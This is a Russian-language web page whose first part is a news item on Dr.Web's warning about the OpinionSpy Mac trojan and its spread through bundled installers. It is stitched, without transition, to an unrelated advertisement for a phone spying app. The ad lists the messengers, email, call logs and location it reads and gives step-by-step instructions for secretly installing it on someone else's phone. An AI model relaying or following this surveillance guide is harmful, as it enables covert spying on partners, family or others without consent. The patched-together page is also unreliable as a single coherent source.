Doctor Web предупреждает о новой угрозе на Mac OS

5e663d0158026573324754a0ba726f01

Обнаруженное Dr.Web троянское приложение может представлять реальную угрозу. Маскируется оно под специальный инструмент, позволяющий производить маркетинговые исследования. Программа OpinionSpy позволяет собирать конфиденциальную информацию с компьютеров пользователей, а затем отсылать её на неустановленный удаленный сервер. Данные могут содержать полную историю всех посещаемых пользователем ресурсов. Особенности работы приложения в различных условиях и ситуациях ещё изучаются.

Важной фичей данного трояна является тотальный мониторинг пользовательского трафика, поскольку отслеживаются все пакеты, проходящие сквозь сетевую карту компьютера. Настройки соединения с Интернетом не будут иметь никакого значения, поскольку каждый отправляемый и принимаемый пакет будет проходить дополнительное сканирование. Также мониторятся приложения на Mac OS,которые поддерживают отправку быстрых текстовых сообщений. Троян способен передавать такие сообщения и самостоятельно, пересылать пользовательскую переписку на удалённые сервера, а также выполнять различный вредоносный код.

Способствует распространению трояна специально созданный файл poinstall, который помещается в установщик различных приложений. Внедряется он на сайты, где представлено программное обеспечение под Mac OS. Пользователь скачивает нужную ему программу, даже не подозревая об опасности. Затем файл автоматически выкачивает из Сети недостающие элементы, происходит установка и настройка. Весь процесс – фоновый, обнаружить его трудно. Прошлая волна атаки OpinionSpy прошла в 2010 году, тогда заражёнными оказались миллионы макбуков.

Как считает Dr.Web, следует внимательно изучать запрашиваемые права, особенно если скаченная программа требует предоставить ей административные привилегии. Права администратора – потолок данной операционной системы, поэтому и пользоваться ими следует с максимальной осторожностью. Последствия могут быть непредсказуемыми. Особенно это касается корпоративных машин с обилием важной служебной информации. Заканчивается доклад Dr.Web напоминанием о необходимости регулярно обновлять антивирусное ПО.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.